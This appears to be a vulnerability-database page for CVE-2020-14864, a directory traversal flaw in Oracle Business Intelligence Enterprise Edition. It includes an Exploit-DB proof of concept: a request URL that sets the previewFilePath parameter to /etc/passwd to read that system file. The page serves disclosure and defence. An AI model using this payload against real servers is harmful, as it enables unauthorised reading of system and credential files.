CVE-2020-14864

unknown KEV

Published 2022-01-18 · Modified 2022-01-18

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

2.5

Description

Path traversal vulnerability, where an attacker can target the preview FilePath parameter of the getPreviewImage function to get access to arbitrary system file.

CISA KEV

Vendor: Oracle
Product: Intelligence Enterprise Edition
Due date: 2022-07-18

Predictions

Exploit likelihood

99%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-48964 webapps linux text · 1 KB

Ivo Palazzolo · 2020-10-28

Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion

text exploit Source: Exploit-DB

# Exploit Title: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion
# Date: 2020-10-27
# Exploit Author: Ivo Palazzolo (@palaziv)
# Reference: https://www.oracle.com/security-alerts/cpuoct2020.html
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/middleware/technologies/bi-enterprise-edition-downloads.html
# Version: 5.5.0.0.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: SUSE Linux Enterprise Server
# CVE: CVE-2020-14864

# Description
A Directory Traversal vulnerability has been discovered in the 'getPreviewImage' function of Oracle Business Intelligence Enterprise Edition. The 'getPreviewImage' function is used to get a preview image of a previously uploaded theme logo. By manipulating the 'previewFilePath' URL parameter an attacker with access to the administration interface is able to read arbitrary system files.

# PoC
https://TARGET/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd

References

https://nvd.nist.gov/vuln/detail/CVE-2020-14864

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.